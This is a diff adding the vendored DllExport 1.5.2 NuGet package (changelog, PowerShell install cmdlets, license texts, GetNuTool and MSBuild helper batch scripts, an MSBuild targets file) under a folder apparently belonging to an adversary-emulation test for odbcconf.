+    * NEW: The one (1) now is used by default as Base for all ordinals. 
+           `Mimic ordinal counter (start from 1 instead of 0)` Issue #8
+         
+    * CHANGED: The ddNS features now as binary cmdlet `NSBin`. Use `nsbin.bat` if needed.
+    * CHANGED: `Set "Inherited = false" in AttributeUsage for DllExportAttribute`. Issue #15
+    * OTHER: other possible changes and fixes.
+
+[v1.3] 2016.08.21
+
+    * FIXED: bug 'Incorrect library' when DllExport installed for 2+ projects.
+    * CHANGED: DllExport now uses `Cdecl` calling convention by default.
+    * CHANGED: Mono.Cecil v0.9.6.4
+
+[v1.2] 2016.07.13
+
+    * CHANGED: dynamic definition of namespace for user scope. Issue #2
+
+[v1.1] 2016.06.29
+
+    * CHANGED: DllExport now is part of System.Runtime.InteropServices as and DllImport.
+    * CHANGED: Mono.Cecil v0.9.6.1
+    * NEW: 0x80070005 meaning... Issue #1
+    * NEW: +DllExport(CallingConvention convention) signature
+
+[v1.0] 2016.06.25
+
+    * Initial the open release, based on v1.2.7.38850
+

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/DllExportCmdLets.psm1

@@ -0,0 +1,141 @@
+function Remove-OldDllExportFolder {
+    param($project)
+    $defaultFiles = ('DllExportAttribute.cs',
+                     'Mono.Cecil.dll',
+                     'RGiesecke.DllExport.dll',
+                     'RGiesecke.DllExport.pdb',
+                     'RGiesecke.DllExport.MSBuild.dll',
+                     'RGiesecke.DllExport.MSBuild.pdb',
+                     'net.r_eg.DllExport.targets')
+
+    $projectFile = New-Object 'System.IO.FileInfo'($project.FullName)
+
+    $projectFile.Directory.GetDirectories("DllExport") | Select-Object -First 1 | % {
+        $dllExportDir = $_
+    
+        if($dllExportDir.GetDirectories().Count -eq 0){
+            $unknownFiles = $dllExportDir.GetFiles() | Select -ExpandProperty Name | ? { -not $defaultFiles -contains $_ }
+    
+            if(-not $unknownFiles){
+                Write-Host "Removing 'DllExport' from " $project.Name
+                $project.ProjectItems | ? {	$_.Name -ieq 'DllExport' } | % {
+                    $_.Remove()
+                }
+
+                Write-Host "Deleting " $dllExportDir.FullName " ..."
+                $dllExportDir.Delete($true)
+            }
+        }
+    }
+}
+
+function Remove-OldDllExportFolders {
+    Get-Project -all | % {
+        Remove-OldDllExportFolder $_
+    }
+}
+
+function Get-MBEGlobalProjectCollection {
+    $msBuildV4Name = 'Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a';
+    $msBuildV4 = [System.Reflection.Assembly]::LoadWithPartialName($msBuildV4Name)
+
+    if(!$msBuildV4) {
+        throw New-Object 'System.IO.FileNotFoundException'("Could not load $msBuildV4Name.")
+    }
+
+    $projectCollection = $msBuildV4.GetType('Microsoft.Build.Evaluation.ProjectCollection')
+
+    return $projectCollection::GlobalProjectCollection
+}
+
+function Get-DllExportMsBuildProjectsByFullName([String] $fullName) {
+    $gpc = Get-MBEGlobalProjectCollection
+
+    return $gpc.GetLoadedProjects($fullName)
+}
+
+function Get-TempPathToDllTools([String] $toolsPath) {
+    
+    $tempRoot   = (Join-Path $([System.IO.Path]::GetTempPath()) '50ACAD2A-5AB3-4E6A-BA66-07F55672E91F') -replace ' ', '` '
+    $tempFolder = $([System.Guid]::NewGuid());
+    $delprefix  = '__del__';
+
+    # rename for checking of lock / loaded assemblies
+    Get-ChildItem -Recurse -Path $tempRoot | ?{ $_.PSIsContainer } | %{ 
+        Rename-Item -ErrorAction SilentlyContinue -Path $_.FullName -NewName "$delprefix$($_.Name)" 
+    }
+
+    # now try to delete only this
+    Get-ChildItem -Recurse -Path $tempRoot | ?{ $_.PSIsContainer -and $_.Name.StartsWith($delprefix) } | %{ 
+        Remove-Item $_.FullName -Force -Recurse -ErrorAction SilentlyContinue
+    }
+
+    $tdll = (Join-Path $tempRoot $tempFolder);
+    if(!(Test-Path -path $tdll)) {
+        New-Item $tdll -Type Directory >$null
+    }
+    Copy-Item $toolsPath\*.dll -Destination $tdll >$null
+
+    return $tdll
+}
+
+function Get-TempPathToConfiguratorIfNotLoaded([String] $asmFile, [String] $toolsPath) {
+    
+    $tdll = Get-TempPathToDllTools $toolsPath
+    $mdll = (Join-Path $tdll $asmFile)
+    
+    if(!(Get-Module -Name $asmFile)) {
+        # Import-Module $mdll;
+        return $mdll
+    }
+    return $null
+}
+
+# solution from here: https://github.com/3F/vsSolutionBuildEvent/blob/master/vsSolutionBuildEvent/Actions/ActionCSharp.cs
+# we can use it from 'init.ps1' for loading only once, or from 'install.ps1' / 'uninstall.ps1' to use always latest assemblies
+function Load-Configurator([String] $toolsPath) {
+
+    Get-Module -All | ?{ $_.Name -like '*net.r_eg.DllExport.Configurator*' } | % { Remove-Module $_ }
+
+    $nsbin  = [System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes("$toolsPath\NSBin.dll"));
+    $conf   = [System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes("$toolsPath\net.r_eg.DllExport.Configurator.dll"));
+
+    return $conf;
+}
+
+function Get-AllDllExportMsBuildProjects {
+    (Get-Project -all | % {
+        Get-DllExportMsBuildProjectsByFullName $_.FullName
+    }) | ? {
+        return ($_.Xml.Imports | ? {
+               "net.r_eg.DllExport.targets" -ieq [System.IO.Path]::GetFileName($_.Project);
+        }).Length -gt 0;
+    }
+}
+
+function Set-NoDllExportsForAnyCpu([String] $projectName, [System.Nullable[bool]] $value) {
+    $projects = Get-AllDllExportMsBuildProjects;
+    
+    [String] $asString = $value;
+
+    if($projectName) {
+        $projects = $projects | where { $_.Name -ieq $projectName };
+    }
+    $propertyName = 'NoDllExportsForAnyCpu';
+    
+    $projects = $projects | where { 
+        $_.GetPropertyValue($propertyName) -ine $asString 
+    } | % {
+        $_.SetProperty($propertyName, $asString);
+    }
+}
+
+Export-ModuleMember Set-NoDllExportsForAnyCpu
+Export-ModuleMember Get-MBEGlobalProjectCollection
+Export-ModuleMember Get-TempPathToDllTools
+Export-ModuleMember Get-TempPathToConfiguratorIfNotLoaded
+Export-ModuleMember Load-Configurator
+Export-ModuleMember Remove-OldDllExportFolder
+Export-ModuleMember Remove-OldDllExportFolders
+Export-ModuleMember Get-DllExportMsBuildProjectsByFullName
+Export-ModuleMember Get-AllDllExportMsBuildProjects

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/LICENSE.TXT

@@ -0,0 +1,21 @@
+The MIT License (MIT)
+
+Copyright (c) .NET Foundation and Contributors
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/PATENTS.TXT

@@ -0,0 +1,47 @@
+Microsoft Patent Promise for .NET Libraries and Runtime Components 
+
+Microsoft Corporation and its affiliates ("Microsoft") promise not to assert 
+any .NET Patents against you for making, using, selling, offering for sale, 
+importing, or distributing Covered Code, as part of either a .NET Runtime or 
+as part of any application designed to run on a .NET Runtime. 
+
+If you file, maintain, or voluntarily participate in any claim in a lawsuit 
+alleging direct or contributory patent infringement by any Covered Code, or 
+inducement of patent infringement by any Covered Code, then your rights under 
+this promise will automatically terminate. 
+
+This promise is not an assurance that (i) any .NET Patents are valid or 
+enforceable, or (ii) Covered Code does not infringe patents or other 
+intellectual property rights of any third party. No rights except those 
+expressly stated in this promise are granted, waived, or received by 
+Microsoft, whether by implication, exhaustion, estoppel, or otherwise. 
+This is a personal promise directly from Microsoft to you, and you agree as a 
+condition of benefiting from it that no Microsoft rights are received from 
+suppliers, distributors, or otherwise from any other person in connection with 
+this promise. 
+
+Definitions: 
+
+"Covered Code" means those Microsoft .NET libraries and runtime components as 
+made available by Microsoft at https://github.com/dotnet/coreclr, 
+https://github.com/dotnet/corefx and https://github.com/dotnet/corert.
+
+".NET Patents" are those patent claims, both currently owned by Microsoft and 
+acquired in the future, that are necessarily infringed by Covered Code. .NET 
+Patents do not include any patent claims that are infringed by any Enabling 
+Technology, that are infringed only as a consequence of modification of 
+Covered Code, or that are infringed only by the combination of Covered Code 
+with third party code. 
+
+".NET Runtime" means any compliant implementation in software of (a) all of 
+the required parts of the mandatory provisions of Standard ECMA-335 – Common 
+Language Infrastructure (CLI); and (b) if implemented, any additional 
+functionality in Microsoft's .NET Framework, as described in Microsoft's API 
+documentation on its MSDN website. For example, .NET Runtimes include 
+Microsoft's .NET Framework and those portions of the Mono Project compliant 
+with (a) and (b). 
+
+"Enabling Technology" means underlying or enabling technology that may be 
+used, combined, or distributed in connection with Microsoft's .NET Framework 
+or other .NET Runtimes, such as hardware, operating systems, and applications 
+that run on .NET Framework or other .NET Runtimes. 

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/README.md

@@ -0,0 +1,18 @@
+[.NET Core Runtime (CoreCLR)](https://github.com/3F/coreclr)
+===========================
+
+This repo contains the .NET Core runtime, called CoreCLR, and the base library, called mscorlib. It includes the garbage collector, JIT compiler, base .NET data types and many low-level classes.
+
+Build Status
+------------
+
+                    | CI
+--------------------| ----------------
+Win.x86-x64.Release | [![Build status](https://ci.appveyor.com/api/projects/status/4gwh8k5wn62tk8iv/branch/master?svg=true)](https://ci.appveyor.com/project/3Fs/coreclr/branch/master)
+
+
+License
+-------
+
+.NET Core (including the coreclr repo) is licensed under the [MIT license](LICENSE.TXT).
+

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/_Version.txt

@@ -0,0 +1,10 @@
+
+Architecture | Platform | Config  | commit-sha1                              | ILD/Asm                   | coreclr | Path
+-------------|----------|---------|------------------------------------------|---------------------------|---------|-------------
+x86          | Windows  | Release | 05afa4f81fdf671429b54467c64d65cde6b5fadc | [ 4.5.1 ] -> *4.5.22220.0 | *v1.0.4 | \bin\Win.x86\
+x64          | Windows  | Release | 05afa4f81fdf671429b54467c64d65cde6b5fadc | [ 4.5.1 ] -> *4.5.22220.0 | *v1.0.4 | \bin\Win.x64\
+
+`* - The base of version, i.e. it can be different from official release`
+
+https://github.com/3F/coreclr
+

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/coreclr/changelog.txt

@@ -0,0 +1,26 @@
+https://github.com/3F/coreclr
+- - - - - - - - - - - - - - - -
+
+# coreclr \ ILAsm
+
+[v4.5.1]
+
+    * FIXED: Fixed using of cvtres (.res -> obj COFF-format) in mscorpe.
+             Possible crash: https://github.com/3F/coreclr/issues/2
+             Related Issue: https://github.com/3F/DllExport/issues/17
+           
+    * NEW: Implemented additional searching of the converters of resources:
+           Environment PATH, local directory, and other additional from user path.
+           Now it also can be wrapped like ` mytool.cmd -> cvtres.exe %* ` etc.
+           
+    * NEW: Added new /CVRES (/CVR) key to ilasm.exe
+           `/CVRES=<path_to_file>   Set path to cvtres tool: /CVR=cvtres.exe /CVR=tool\cvtres.cmd /CVR=D:\tool\`
+           
+    * NOTE: based on 4.5.22220.0  / coreclr 1.0.4
+                     ^ ^  ^    ^
+                     | |  |    |-- VER_FILEVERSIONREVISION
+                     | |  |------- VER_FILEVERSIONBUILD
+                     | |---------- VER_FILEVERSIONMINOR
+                     |------------ VER_MAJORVERSION
+                     
+

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/gnt.bat

@@ -0,0 +1,59 @@
+@echo off
+:: GetNuTool - Executable version
+:: Copyright (c) 2015-2016  Denis Kuzmin [ entry.reg@gmail.com ]
+:: https://github.com/3F/GetNuTool
+
+set gntcore=gnt.core
+set tgnt="%temp%\%random%%random%%gntcore%"
+
+set args=%*
+set a=%args:~0,30%
+set a=%a:"=%
+
+if "%a:~0,7%"=="-unpack" goto unpack
+if "%a:~0,8%"=="-msbuild" goto ufound
+
+for %%v in (14.0, 12.0, 15.0, 4.0, 3.5, 2.0) do (
+    for /F "usebackq tokens=2* skip=2" %%a in (
+        `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild\ToolsVersions\%%v" /v MSBuildToolsPath 2^> nul`
+    ) do if exist %%b (
+        set msbuild="%%b\msbuild.exe"
+        goto found
+    )
+)
+echo MSBuild was not found, try: gnt -msbuild "fullpath" args 1>&2
+goto exit
+
+
+:ufound
+call :popa %1
+shift
+set msbuild=%1
+call :popa %1
+
+:found
+call :core
+%msbuild% %tgnt% /nologo /p:wpath="%~dp0/" /v:m %args%
+del /Q/F %tgnt%
+goto exit
+
+:popa
+call set args=%%args:%1^=%%
+exit /B 0
+
+:unpack
+set tgnt=%~dp0\%gntcore%
+echo Generate minified version in %tgnt% ...
+
+:core
+<nul set /P ="">%tgnt%
+<nul set /P =^<!-- GetNuTool - github.com/3F/GetNuTool --^>^<!-- Copyright (c) 2015-2016  Denis Kuzmin [ entry.reg@gmail.com ] --^>^<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"^>^<PropertyGroup^>^<ngconfig Condition="'$(ngconfig)' == ''"^>packages.config^</ngconfig^>^<ngserver Condition="'$(ngserver)' == ''"^>https://www.nuget.org/api/v2/package/^</ngserver^>^<ngpackages Condition="'$(ngpackages)' == ''"^>^</ngpackages^>^<ngpath Condition="'$(ngpath)' == ''"^>packages^</ngpath^>^</PropertyGroup^>^<Target Name="get" BeforeTargets="Build" DependsOnTargets="header"^>^<PrepareList config="$(ngconfig)" plist="$(ngpackages)" wpath="$(wpath)"^>^<Output PropertyName="plist" TaskParameter="Result"/^>^</PrepareList^>^<NGDownload plist="$(plist)" url="$(ngserver)" wpath="$(wpath)" defpath="$(ngpath)" debug="$(debug)"/^>^</Target^>^<Target Name="pack" DependsOnTargets="header"^>^<NGPack dir="$(ngin)" dout="$(ngout)" wpath="$(wpath)" vtool="$(GetNuTool)" debug="$(debug)"/^>^</Target^>^<PropertyGroup^>^<TaskCoreDllPath Condition="Exists('$(MSBuildToolsPath)\Microsoft.Build.Tasks.v$(MSBuildToolsVersion).dll')"^>$(MSBuildToolsPath)\Microsoft.Build.Tasks.v$(MSBuildToolsVersion).dll^</TaskCoreDllPath^>^<TaskCoreDllPath Condition="'$(TaskCoreDllPath)' == '' and Exists('$(MSBuildToolsPath)\Microsoft.Build.Tasks.Core.dll')"^>$(MSBuildToolsPath)\Microsoft.Build.Tasks.Core.dll^</TaskCoreDllPath^>^</PropertyGroup^>^<UsingTask TaskName="PrepareList" TaskFactory="CodeTaskFactory" AssemblyFile="$(TaskCoreDllPath)"^>^<ParameterGroup^>^<config Parame>> %tgnt%
+<nul set /P =terType="System.String" Required="true"/^>^<plist ParameterType="System.String"/^>^<wpath ParameterType="System.String"/^>^<Result ParameterType="System.String" Output="true"/^>^</ParameterGroup^>^<Task^>^<Reference Include="System.Xml"/^>^<Reference Include="System.Xml.Linq"/^>^<Using Namespace="System"/^>^<Using Namespace="System.Collections.Generic"/^>^<Using Namespace="System.IO"/^>^<Using Namespace="System.Xml.Linq"/^>^<Code Type="Fragment" Language="cs"^>^<![CDATA[if(!String.IsNullOrEmpty(plist)){Result=plist;return true;}var _err=Console.Error;Action^<string,Queue^<string^>^> h=delegate(string cfg,Queue^<string^> list){foreach(var pkg in XDocument.Load(cfg).Descendants("package")){var id=pkg.Attribute("id");var version=pkg.Attribute("version");var output=pkg.Attribute("output");if(id==null){_err.WriteLine("Some 'id' does not exist in '{0}'",cfg);return;}var link=id.Value;if(version!=null){link+="/"+version.Value;}if(output!=null){list.Enqueue(link+":"+output.Value);continue;}list.Enqueue(link);}};var ret=new Queue^<string^>();foreach(var cfg in config.Split('^|',';')){var lcfg=Path.Combine(wpath,cfg??"");if(File.Exists(lcfg)){h(lcfg,ret);}else{_err.WriteLine(".config '{0}' was not found.",lcfg);}}if(ret.Count ^< 1){_err.WriteLine("List of packages is empty. Use .config or /p:ngpackages=\"...\"\n");}else{Result=String.Join(";",ret.ToArray());}]]^>^</Code^>^</Task^>^</UsingTask^>^<UsingTask TaskName="NGDownload" TaskFactory="CodeTaskFactory" AssemblyFile="$(TaskCoreDllPath)"^>^<ParameterGroup^>^<plist ParameterType="System.String"/^>^<url Paramet>> %tgnt%
+<nul set /P =erType="System.String" Required="true"/^>^<wpath ParameterType="System.String"/^>^<defpath ParameterType="System.String"/^>^<debug ParameterType="System.Boolean"/^>^</ParameterGroup^>^<Task^>^<Reference Include="WindowsBase"/^>^<Using Namespace="System"/^>^<Using Namespace="System.IO"/^>^<Using Namespace="System.IO.Packaging"/^>^<Using Namespace="System.Net"/^>^<Code Type="Fragment" Language="cs"^>^<![CDATA[if(plist==null){return false;}var ignore=new string[]{"/_rels/","/package/","/[Content_Types].xml"};Action^<string,object^> dbg=delegate(string s,object p){if(debug){Console.WriteLine(s,p);}};Func^<string,string^> loc=delegate(string p){return Path.Combine(wpath,p??"");};Action^<string,string,string^> get=delegate(string link,string name,string path){var output=Path.GetFullPath(loc(path??name));if(Directory.Exists(output)){Console.WriteLine("`{0}` is already exists. /pass `{1}`",name,output);return;}Console.Write("Getting `{0}` ... ",link);var temp=Path.Combine(Path.GetTempPath(),name);using(var l=new WebClient()){try{l.Headers.Add("User-Agent","GetNuTool");l.UseDefaultCredentials=true;l.DownloadFile(url+link,temp);}catch(Exception ex){Console.Error.WriteLine(ex.Message);return;}}Console.WriteLine("Extracting into `{0}`",output);using(var package=ZipPackage.Open(temp,FileMode.Open,FileAccess.Read)){foreach(var part in package.GetParts()){var uri=Uri.UnescapeDataString(part.Uri.OriginalString);if(ignore.Any(x=^> uri.StartsWith(x,StringComparison.Ordinal))){continue;}var dest=Path.Combine(output,uri.TrimStart('/'));dbg("- `{0}`",uri);var dir=Path.Get>> %tgnt%
+<nul set /P =DirectoryName(dest);if(!Directory.Exists(dir)){Directory.CreateDirectory(dir);}using(var source=part.GetStream(FileMode.Open,FileAccess.Read))using(var target=File.OpenWrite(dest)){source.CopyTo(target);}}}dbg("Done.{0}",Environment.NewLine);};foreach(var package in plist.Split(';')){var ident=package.Split(':');var link=ident[0];var path=(ident.Length ^> 1)?ident[1]: null;var name=link.Replace('/','.');if(!String.IsNullOrEmpty(defpath)){path=Path.Combine(defpath,path??name);}get(link,name,path);}]]^>^</Code^>^</Task^>^</UsingTask^>^<UsingTask TaskName="NGPack" TaskFactory="CodeTaskFactory" AssemblyFile="$(TaskCoreDllPath)"^>^<ParameterGroup^>^<dir ParameterType="System.String" Required="true"/^>^<dout ParameterType="System.String"/^>^<wpath ParameterType="System.String"/^>^<vtool ParameterType="System.String" Required="true"/^>^<debug ParameterType="System.Boolean"/^>^</ParameterGroup^>^<Task^>^<Reference Include="System.Xml"/^>^<Reference Include="System.Xml.Linq"/^>^<Reference Include="WindowsBase"/^>^<Using Namespace="System"/^>^<Using Namespace="System.Collections.Generic"/^>^<Using Namespace="System.IO"/^>^<Using Namespace="System.Linq"/^>^<Using Namespace="System.IO.Packaging"/^>^<Using Namespace="System.Xml.Linq"/^>^<Using Namespace="System.Text.RegularExpressions"/^>^<Code Type="Fragment" Language="cs"^>^<![CDATA[var EXT_NUSPEC=".nuspec";var EXT_NUPKG=".nupkg";var TAG_META="metadata";var DEF_CONTENT_TYPE="application/octet";var MANIFEST_URL="http://schemas.microsoft.com/packaging/2010/07/manifest";var ID="id";var VER="version";Action^<string,>> %tgnt%
+<nul set /P =object^> dbg=delegate(string s,object p){if(debug){Console.WriteLine(s,p);}};var _err=Console.Error;dir=Path.Combine(wpath,dir);if(!Directory.Exists(dir)){_err.WriteLine("`{0}` was not found.",dir);return false;}dout=Path.Combine(wpath,dout??"");var nuspec=Directory.GetFiles(dir,"*"+EXT_NUSPEC,SearchOption.TopDirectoryOnly).FirstOrDefault();if(nuspec==null){_err.WriteLine("{0} was not found in `{1}`",EXT_NUSPEC,dir);return false;}Console.WriteLine("Found {0}: `{1}`",EXT_NUSPEC,nuspec);var root=XDocument.Load(nuspec).Root.Elements().FirstOrDefault(x=^> x.Name.LocalName==TAG_META);if(root==null){_err.WriteLine("{0} does not contain {1}.",nuspec,TAG_META);return false;}var metadata=new Dictionary^<string,string^>();foreach(var tag in root.Elements()){metadata[tag.Name.LocalName.ToLower()]=tag.Value;}if(metadata[ID].Length ^> 100 ^|^|!Regex.IsMatch(metadata[ID],@"^\w+([_.-]\w+)*$",RegexOptions.IgnoreCase ^| RegexOptions.ExplicitCapture)){_err.WriteLine("The format of `{0}` is not correct.",ID);return false;}new Version(metadata[VER]);var ignore=new string[]{Path.Combine(dir,"_rels"),Path.Combine(dir,"package"),Path.Combine(dir,"[Content_Types].xml")};var pout=String.Format("{0}.{1}{2}",metadata[ID],metadata[VER],EXT_NUPKG);if(!String.IsNullOrWhiteSpace(dout)){if(!Directory.Exists(dout)){Directory.CreateDirectory(dout);}pout=Path.Combine(dout,pout);}Console.WriteLine("Started packing `{0}` ...",pout);using(var package=Package.Open(pout,FileMode.Create)){var manifestUri=new Uri(String.Format("/{0}{1}",metadata[ID],EXT_NUSPEC),UriKind.Relative);package.Creat>> %tgnt%
+<nul set /P =eRelationship(manifestUri,TargetMode.Internal,MANIFEST_URL);foreach(var file in Directory.GetFiles(dir,"*.*",SearchOption.AllDirectories)){if(ignore.Any(x=^> file.StartsWith(x,StringComparison.Ordinal))){continue;}string pUri;if(file.StartsWith(dir,StringComparison.OrdinalIgnoreCase)){pUri=file.Substring(dir.Length).TrimStart(Path.DirectorySeparatorChar);}else{pUri=file;}dbg("- `{0}`",pUri);var escaped=String.Join("/",pUri.Split('\\','/').Select(p=^> Uri.EscapeDataString(p)));var uri=PackUriHelper.CreatePartUri(new Uri(escaped,UriKind.Relative));var part=package.CreatePart(uri,DEF_CONTENT_TYPE,CompressionOption.Maximum);using(var tstream=part.GetStream())using(var fs=new FileStream(file,FileMode.Open,FileAccess.Read)){fs.CopyTo(tstream);}}Func^<string,string^> getmeta=delegate(string key){return(metadata.ContainsKey(key))?metadata[key]:"";};var _p=package.PackageProperties;_p.Creator=getmeta("authors");_p.Description=getmeta("description");_p.Identifier=metadata[ID];_p.Version=metadata[VER];_p.Keywords=getmeta("tags");_p.Title=getmeta("title");_p.LastModifiedBy="GetNuTool v"+vtool;}]]^>^</Code^>^</Task^>^</UsingTask^>^<Target Name="Build" DependsOnTargets="get"/^>^<PropertyGroup^>^<GetNuTool^>1.6^</GetNuTool^>^<wpath Condition="'$(wpath)' == ''"^>$(MSBuildProjectDirectory)^</wpath^>^</PropertyGroup^>^<Target Name="header"^>^<Message Text="%%0D%%0AGetNuTool v$(GetNuTool) - github.com/3F%%0D%%0A=========%%0D%%0A" Importance="high"/^>^</Target^>^</Project^>>> %tgnt%
+
+
+:exit
+exit /B 0

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/init.ps1

@@ -0,0 +1,8 @@
+param($installPath, $toolsPath, $package, $project)
+
+# init.ps1 - once for serial install/remove
+
+Import-Module (Join-Path $toolsPath DllExportCmdLets.psm1)
+
+# TODO: required for 'Load-Configurator'
+$cecil = [System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes("$toolsPath\Mono.Cecil.dll"));

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/install.ps1

@@ -0,0 +1,59 @@
+param($installPath, $toolsPath, $package, $project)
+
+$targetFileName     = 'net.r_eg.DllExport.targets'
+$assemblyFName      = 'DllExport' # $package.AssemblyReferences[0].Name
+$publicKeyToken     = '8337224C9AD9E356';
+$metaLib            = $([System.IO.Path]::Combine("$installPath", 'lib\net20', $assemblyFName + '.dll'));
+$targetFileName     = [IO.Path]::Combine($toolsPath, $targetFileName)
+$targetUri          = New-Object Uri -ArgumentList $targetFileName, [UriKind]::Absolute
+$gpc                = Get-MBEGlobalProjectCollection
+$projects           = $gpc.GetLoadedProjects($project.FullName)
+
+# GUI Configurator
+
+# powershell -Command "Import-Module (Join-Path $escToolsPath Configurator.dll); Set-Configuration -Dll $asmpath"
+
+# $dllConf = Get-TempPathToConfiguratorIfNotLoaded 'net.r_eg.DllExport.Configurator.dll' "$toolsPath"
+# if($dllConf) {
+#     Import-Module $dllConf; 
+# }
+
+Import-Module (Load-Configurator "$toolsPath")
+Set-Configuration -MetaLib "$metaLib" -InstallPath "$installPath" -ToolsPath "$toolsPath" -ProjectDTE $project -ProjectsMBE $gpc;
+
+
+# change the reference to DllExport.dll to not be copied locally
+
+$project.Object.References | ? { 
+    $_.Name -ieq $assemblyFName -And $_.PublicKeyToken -ieq $publicKeyToken
+} | % {
+    if($_ | Get-Member | ? {$_.Name -eq "CopyLocal"}){
+        $_.CopyLocal = $false
+    }
+}
+
+$projects |  % {
+    $currentProject = $_
+
+    # remove imports of net.r_eg.DllExport.targets from this project 
+    $currentProject.Xml.Imports | ? {
+        return ($targetFileName -ieq [IO.Path]::GetFileName($_.Project))
+    }  | % {  
+        $currentProject.Xml.RemoveChild($_);
+    }
+
+    # remove the properties DllExportAttributeFullName and DllExportAttributeAssemblyName
+    $currentProject.Xml.Properties | ? {
+        $_.Name -eq "DllExportAttributeFullName" -or $_.Name -eq "DllExportAttributeAssemblyName"
+    } | % {
+        $_.Parent.RemoveChild($_)
+    }
+
+    $projectUri = New-Object Uri -ArgumentList $currentProject.FullPath, [UriKind]::Absolute
+    $relativeUrl = $projectUri.MakeRelative($targetUri)
+    $import = $currentProject.Xml.AddImport($relativeUrl)
+    $import.Condition = "Exists('$relativeUrl')";
+    
+    # remove the old stuff in the DllExports folder from previous versions, (will check that only known files are in it)
+    Remove-OldDllExportFolder $project
+}

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/msbuild.bat

@@ -0,0 +1,63 @@
+@echo off
+setlocal enableDelayedExpansion
+
+:: The MSBuild-helper. Part of GetNuTool
+:: https://github.com/3F/GetNuTool
+
+:: arguments:
+::
+::      msbuild -notamd64 <args> - to select x86 instance instead of x64 if it's possible.
+::      msbuild <args> - to select any available instance.
+::
+
+set args=%*
+set notamd64=0
+
+set a=%args:~0,30%
+set a=%a:"=%
+
+if "%a:~0,9%"=="-notamd64" (
+    call :popa %1
+    shift
+    set notamd64=1
+)
+
+for %%v in (14.0, 12.0, 15.0, 4.0, 3.5, 2.0) do (
+    for /F "usebackq tokens=2* skip=2" %%a in (
+        `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild\ToolsVersions\%%v" /v MSBuildToolsPath 2^> nul`
+    ) do if exist %%b (
+
+        if NOT "%notamd64%" == "1" (
+            set msbuild=%%b\msbuild.exe
+            goto found
+        )
+
+        :: 7z & amd64\msbuild - https://github.com/3F/vsSolutionBuildEvent/issues/38
+        set _amd=..\msbuild.exe
+        if exist "%%b/!_amd!" (
+            set msbuild=%%b\!_amd!
+        ) else ( 
+            set msbuild=%%b\msbuild.exe
+        )
+        goto found
+    )
+)
+
+echo MSBuild was not found, try: ` "full_path_to_msbuild.exe" arguments ` 1>&2
+goto exit
+
+
+:found
+
+set msbuild="%msbuild%"
+
+echo MSBuild Tools: %msbuild% 
+
+%msbuild% %args%
+
+:popa
+call set args=%%args:%1^=%%
+exit /B 0
+
+:exit
+exit /B 0

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/net.r_eg.DllExport.targets

@@ -0,0 +1,75 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+
+  <PropertyGroup>
+    <DllExportRootPkg Condition="'$(DllExportRootPkg)' == ''">$(MSBuildThisFileDirectory)..\</DllExportRootPkg>
+    <DllExportLibPath Condition="'$(DllExportLibPath)' == ''">lib\net20\</DllExportLibPath>
+    <DllExportToolsPath Condition="'$(DllExportToolsPath)' == ''">tools\</DllExportToolsPath>
+    
+    <DllExportNamespace Condition="'$(DllExportNamespace)' == ''">System.Runtime.InteropServices</DllExportNamespace>
+    <DllExportLibFullPath Condition="'$(DllExportLibFullPath)' == ''">$(DllExportRootPkg)$(DllExportLibPath)</DllExportLibFullPath>
+    <DllExportMetaLibAttr Condition="'$(DllExportMetaLibAttr)' == ''">DllExportAttribute</DllExportMetaLibAttr>
+    <DllExportMetaLibName Condition="'$(DllExportMetaLibName)' == ''">DllExport.dll</DllExportMetaLibName>
+    <DllExportMetaLibFullPath Condition="'$(DllExportMetaLibFullPath)' == ''">$(DllExportLibFullPath)$(DllExportMetaLibName)</DllExportMetaLibFullPath>
+    <DllExportDDNSCecil Condition="'$(DllExportDDNSCecil)' == ''">true</DllExportDDNSCecil>
+    <DllExportOurILAsm Condition="'$(DllExportOurILAsm)' == ''">true</DllExportOurILAsm>
+    <DllExportOurILAsmPath Condition="'$(DllExportOurILAsmPath)' == ''">$(DllExportRootPkg)$(DllExportToolsPath)coreclr\</DllExportOurILAsmPath>
+  </PropertyGroup>
+
+  <Target Name="DllExportMod" AfterTargets="PostBuildEvent;Build" DependsOnTargets="GetFrameworkPaths">
+    <PropertyGroup>
